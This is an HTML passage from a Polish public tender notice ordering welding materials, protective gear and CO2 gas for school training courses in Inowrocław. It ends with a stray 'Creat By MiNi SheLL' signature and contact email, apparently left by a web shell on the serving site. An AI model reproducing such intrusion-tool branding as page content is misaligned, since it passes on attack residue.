<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zakup i dostawa pomocy dydaktycznych (materiały, sprzęt i literatura) na potrzeby zajęć prowadzonych w ramach projektu pn. Twoja wiedza - Twoja przyszłość - zajęcia pozalekcyjne z zakresu spawania elektrycznego (metoda 111) i MAG (metoda 135) - materiały i akcesoria spawalnicze..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa  materiałów i akcesoriów na potrzeby zajęć pozalekcyjnych z zakresu spawania elektrycznego (metoda 111) i MAG (metoda 135) 
Materiały wykorzystywane w trakcie zajęć spawania (metoda 111)
1.elektrody Fi 3,25 - 55 paczek
2.elektrody Fi 2,5  - 20 paczek
3.płaskownik 50 x 5 - 72 mb - szt. 1
4.płaskownik 100 x 6  - 72 mb - szt.	1
5.rura 48,3 x 2,9 - 60 mb - szt. 1
Akcesoria spawalnicze
1.uchwyty spawalnicze 2O0A - szt.	10
2.przewody prądowe do spawarki SELCO GENESIS 1700 TLH -  kpl. 5
3.przewody masowe spawarki SELCO GENESIS 1700 TLH - kpl. 5

Materiały wykorzystywane w trakcie zajęć spawania metodą MAG (metoda 135)
1.blacha czarna 3x1000x2000 - 96 kg - szt.	1
2.blacha czarna 6x1000x2000 - 96 kg - szt.	1
3.rura czarna 48,3x2,9 - 60 mb - szt. 1
4.płaskownik 50x5  - 72 mb - szt. 1
5.drut Fi1,0 - 450 kg	- szt. 1
Akcesoria spawalnicze
1.ściernica 200x20x32x90A 80K - szt. 4
2.końcówki prądowe O 1 - 1 opakowanie ( zawiera 50 szt.) - op. 1
3.dysza nr 5  - szt. 20
4.reduktor z przepływomierzem - szt. 4
Przedmiot zamówienia określony w zadaniu należy dostarczyć do Centrum Kształcenia Praktycznego w Inowrocławiu ul. Dworcowa 25, 88-100 Inowrocław..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zakup i dostawa pomocy dydaktycznych (materiały, sprzęt i literatura) na potrzeby zajęć prowadzonych w ramach projektu pn. Twoja wiedza - Twoja przyszłość - zajęcia pozalekcyjne z zakresu spawania elektrycznego (metoda 111) i MAG (metoda 135) - Odzież robocza i sprzęt ochrony osobistej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa odzieży roboczej i sprzętu ochrony osobistej niezbędnej na potrzeby zajęć pozalekcyjnych z zakresu spawania elektrycznego (metoda 111) i MAG (metoda 135) 
Zajęcia pozalekcyjne z zakresu spawania elektrycznego (metoda 111) 
1) Ubrania (odzież robocza) - kpl. 10: Ubranie robocze typu komfort (spodnie ogrodniczki + bluza) - materiał POLYESTER oraz BAWEŁNA rozmiar: L x 5 szt. XL x 5 szt.,  czapka typu baseballowego. 
2) Sprzęt ochrony osobistej
a) maski spawalnicze (tarcz spawalnicza)- 15 szt.
b) okulary ochronne białe - 10 szt.
c) filtry do spawania łukiem elektrycznym nr 9 - 10 szt.
d) filtry do spawania łukiem elektrycznym nr 10 - 10 szt.
e) szkło ochronne białe - 30 szt.
f) fartuch ochronny spawalniczy skórzany - 10 szt.
g) ochraniacze skórzane na obuwie - 10 kpl.
h) rękawice spawalnicze skórzane długie - 15 par

Materiały wykorzystywane w trakcie zajęć metodą MAG (metoda 135)
1) Ubrania (odzież robocza) - kpl. 10: Ubranie robocze typu komfort (spodnie ogrodniczki + bluza) - materiał POLYESTER oraz BAWEŁNA rozmiar L x 5szt.  XL x 5szt., czapka typu baseballowego.
2) Sprzęt ochrony osobistej
a) przyłbice spawalnicze  - 10 szt.
b) rękawice spawalnicze skórzane do metody MAG - 15 par
c) okulary ochronne białe - 10 szt.
d) szkło ochronne ciemne nr 10 o wymiarach 80xl00 - 10 szt.
e) szkło ochronne ciemne nr 11 o wymiarach 80xl00 - 10 szt.
f) szkło ochronne białe o wymiarach 80x100 - 30 szt.
Przedmiot zamówienia określony w zadaniu należy dostarczyć do Centrum Kształcenia Praktycznego w Inowrocławiu ul. Dworcowa 25, 88-100 Inowrocław..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zakup i dostawa pomocy dydaktycznych (materiały, sprzęt i literatura) na potrzeby zajęć prowadzonych w ramach projektu pn. Twoja wiedza - Twoja przyszłość - zajęcia pozalekcyjne z zakresu spawania MAG (metoda 135)- gazy techniczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa gazów technicznych do przeprowadzenia zajęć pozalekcyjnych z zakresu spawania MAG (metoda 135). 
1. gazy techniczne CO2 (butla 30 kg) wraz z dzierżawą butli i kosztami pozostałymi - szt. 30
Przedmiot zamówienia określony w zadaniu będzie dostarczany sukcesywnie na wniosek Zamawiającego w ciągu 3 dni od daty złożenia zamówienia drogą telefoniczną, faksem lub elektroniczną. Przedmiot będzie dostarczany do Centrum Kształcenia Praktycznego w Inowrocławiu ul. Dworcowa 25, 88-100 Inowrocław. 
Gazy stanowiące przedmiot zamówienia muszą spełniać wszelki normy w zakresie ich transportu i użytkowania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 24.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com